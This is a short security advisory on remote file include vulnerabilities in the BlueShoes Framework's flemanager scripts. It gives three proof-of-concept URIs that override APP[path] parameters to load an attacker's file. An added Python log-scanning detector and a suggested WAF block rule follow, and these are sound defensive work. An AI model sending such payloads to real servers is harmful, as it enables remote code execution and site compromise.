BlueShoes Framework Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/applications/flemanager/file.php?APP[path][core]=$h£ll.txt?
http://www.example.com/[path]/applications/flemanager/global.conf.php?APP[path][bsRoot]=$h£ll.txt?
http://www.example.com/[path]/applications/flemanager/viewer.php?APP[path][bsRoot]=$h£ll.txt?
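
A detection check for the request pattern in the URIs above, as an added example that is not part of the original advisory: it scans access-log lines for any query parameter that sets `APP[...]`, including names sent with percent-encoded brackets. The log lines, the `/bs/` install path and the host names are constructed, and the check assumes legitimate clients never send an `APP` parameter.

```python
import re
from urllib.parse import parse_qsl

# Request target inside a combined-log-format line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names that address the APP array, e.g. APP[path][core]
APP_KEY_RE = re.compile(r'^APP(\[|$)')
# Values that point at a remote resource rather than a local path
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def app_overrides(target):
    """Return (name, value) pairs in the query string that set APP[...]."""
    query = target.partition('?')[2]
    # parse_qsl percent-decodes names, so APP%5Bpath%5D... is caught too
    pairs = parse_qsl(query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if APP_KEY_RE.match(k)]


def scan(lines):
    """Yield (line_no, name, value, is_remote) for every flagged parameter."""
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parsable request line
        for name, value in app_overrides(m.group(1)):
            yield no, name, value, bool(REMOTE_RE.match(value))


# Constructed sample log lines (assumption: combined log format, /bs/ install path)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] '
    '"GET /bs/applications/flemanager/file.php?id=7 HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] '
    '"GET /bs/applications/flemanager/file.php?APP[path][core]=http://files.example.net/x.txt? HTTP/1.1" 200 90',
    '192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] '
    '"GET /bs/applications/flemanager/viewer.php?APP%5Bpath%5D%5BbsRoot%5D=/tmp/x.txt HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same name match can be used as a block rule at a reverse proxy or WAF in front of the affected scripts.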


 

Copyright 2010, SecurityFocus